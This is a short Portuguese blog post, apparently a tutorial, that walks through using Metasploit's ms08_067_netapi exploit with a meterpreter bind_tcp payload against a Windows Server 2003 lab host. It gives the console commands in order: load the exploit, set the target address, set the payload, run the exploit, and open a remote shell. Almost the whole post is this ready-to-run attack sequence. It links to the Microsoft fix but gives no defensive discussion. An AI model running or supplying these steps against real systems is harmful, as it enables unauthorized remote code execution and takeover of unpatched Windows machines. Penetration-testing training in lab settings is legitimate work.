MrTcp - Exploit ms08_067_netapi + payload bind_tcp
Ola desta vez vamos usar o exploit ms08_067_netapi com a payload bind_tcp no meterpreter, mais informações sobre esta falha nos sistemas da Microsoft e como resolver pode ver neste link : MS08-067
PAYLOAD= windows/meterpreter/bind_tcp
EXPLOIT= exploit/smb/ms08_067_netapi
IP local= 192.168.1.4
IP remoto= 192.168.1.2
SO local = Backtrack4
SO remoto = Windows Server 2003 SP0
//Abrir o MetaSploit
# cd /pentest/exploit/framework3
#./msfconsole
//Escolher Exploit ms08_067_netapi
#use windows/smb/ms08_067_netapi
//Ver Opçoes
#show options
//Definir opçoes
#set RHOST 192.168.1.2
//Definir payload
#set payload windows/meterpreter/bind_tcp
//explorar a maquina
#exploit
//Se tudo correu bem ate aqui já estamos na maquina alvo, podemos executar o comando #help
para ver todas as opções do framework disponíveis. Se quisermos abrir o DOS da maquina alvo e só digitar o comando #shell
0 comentários:
Enviar um comentário